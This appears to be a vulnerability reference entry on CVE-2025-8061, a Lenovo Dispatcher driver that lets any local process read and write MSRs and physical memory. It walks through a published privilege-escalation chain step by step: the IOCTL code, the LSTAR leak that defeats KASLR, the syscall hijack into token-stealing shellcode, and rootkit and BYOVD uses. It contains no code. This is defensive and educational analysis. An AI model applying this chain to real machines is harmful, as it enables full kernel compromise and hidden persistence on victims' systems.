CVE-2025-8061
LnvMSRIO.sys -- Lenovo pre-installed driver gives any local process unrestricted MSR and physical memory access, complete SYSTEM exploit chain published
Summary
| Field | Value |
|---|---|
| Driver | LnvMSRIO.sys (Lenovo Dispatcher 3.0 / 3.1) |
| Vendor | Lenovo |
| Vulnerability Class | Insufficient Access Control / Arbitrary MSR R/W / Physical Memory R/W |
| Exploited ITW | No (multiple public PoCs) |
| Status | Patched in v3.1.0.41 (September 2025); older versions still loadable |
Context
CVE-2025-8061 is a textbook case of a vendor utility driver that ships on millions of consumer laptops and exposes the most powerful hardware primitives to any local process. Lenovo's Dispatcher driver provides MSR read/write and physical memory read/write through IOCTLs with no access restrictions. Quarkslab published a two-part exploit series showing the complete path from unprivileged user to SYSTEM, plus a full kernel rootkit built on the same primitives.
What makes this CVE particularly instructive is the quality of public analysis. Quarkslab's writeup walks through KASLR bypass via MSR leak, LSTAR overwrite for syscall hijacking, and token theft, providing a complete reference implementation for MSR-based kernel exploitation.
Root Cause
The Lenovo Dispatcher driver exposes four IOCTL handlers, each providing unrestricted access to a critical hardware interface:
MSR read allows reading any Model-Specific Register, including IA32_LSTAR (0xC0000082), which stores the address of KiSystemCall64. Reading this MSR reveals the kernel's base address, completely defeating KASLR.
MSR write allows overwriting any MSR register. Writing to IA32_LSTAR redirects all future system calls through an attacker-controlled address.
Physical memory read maps and reads arbitrary physical addresses via MmMapIoSpace, allowing the attacker to scan physical memory for kernel structures.
Physical memory write maps and writes arbitrary physical addresses, providing a direct physical memory write primitive.
The driver is signed by Lenovo and ships pre-installed on consumer notebooks as part of the Lenovo Dispatcher service. No special privileges beyond local authentication are required to open the device and invoke these IOCTLs.
Exploitation
Quarkslab's two-part series documents the full exploitation path.
Part 1 builds a SYSTEM shell. The exploit starts by reading the IA32_LSTAR MSR through IOCTL 0x9c402084. This returns the address of KiSystemCall64, from which the kernel base is computed, defeating KASLR in a single call. Next, the exploit overwrites IA32_LSTAR with the address of token-stealing shellcode. The next system call from any thread on that processor now redirects to the shellcode instead of the real KiSystemCall64. The shellcode walks _KPCR to _KTHREAD to _EPROCESS, finds the SYSTEM process token, and copies it to the current process. It then immediately restores the original IA32_LSTAR value to prevent a BSOD from subsequent system calls. The attacker now has a SYSTEM token.
Part 2 builds a kernel rootkit. Using the same MSR and physical memory primitives, Quarkslab demonstrates process hiding, callback interception, and persistence mechanisms, all without writing a single kernel driver of their own.
Exploitation Primitive
IOCTL 0x9c402084 --> read IA32_LSTAR MSR --> leak KiSystemCall64 --> KASLR bypass
--> overwrite IA32_LSTAR with shellcode address
--> next syscall executes token-stealing shellcode
--> restore LSTAR --> SYSTEM
Techniques Used
| Technique | KernelSight Page |
|---|---|
| Token Swapping | Token Swapping |
| KASLR Bypass (MSR leak) | KASLR Bypasses |
| Direct IOCTL R/W | Direct IOCTL R/W |
Broader Significance
CVE-2025-8061 exposes a systemic problem with vendor utility drivers. Lenovo shipped this driver pre-installed on consumer laptops, meaning millions of machines had a kernel-level backdoor available to any local attacker. The patch arrived in September 2025, but older versions remain loadable through BYOVD since the signing certificate is still valid. Until Microsoft adds the vulnerable versions to the driver blocklist, the patched driver coexists with loadable vulnerable copies.
The Quarkslab writeup also serves as one of the clearest public references for MSR-based kernel exploitation, making CVE-2025-8061 both a vulnerability and an educational resource.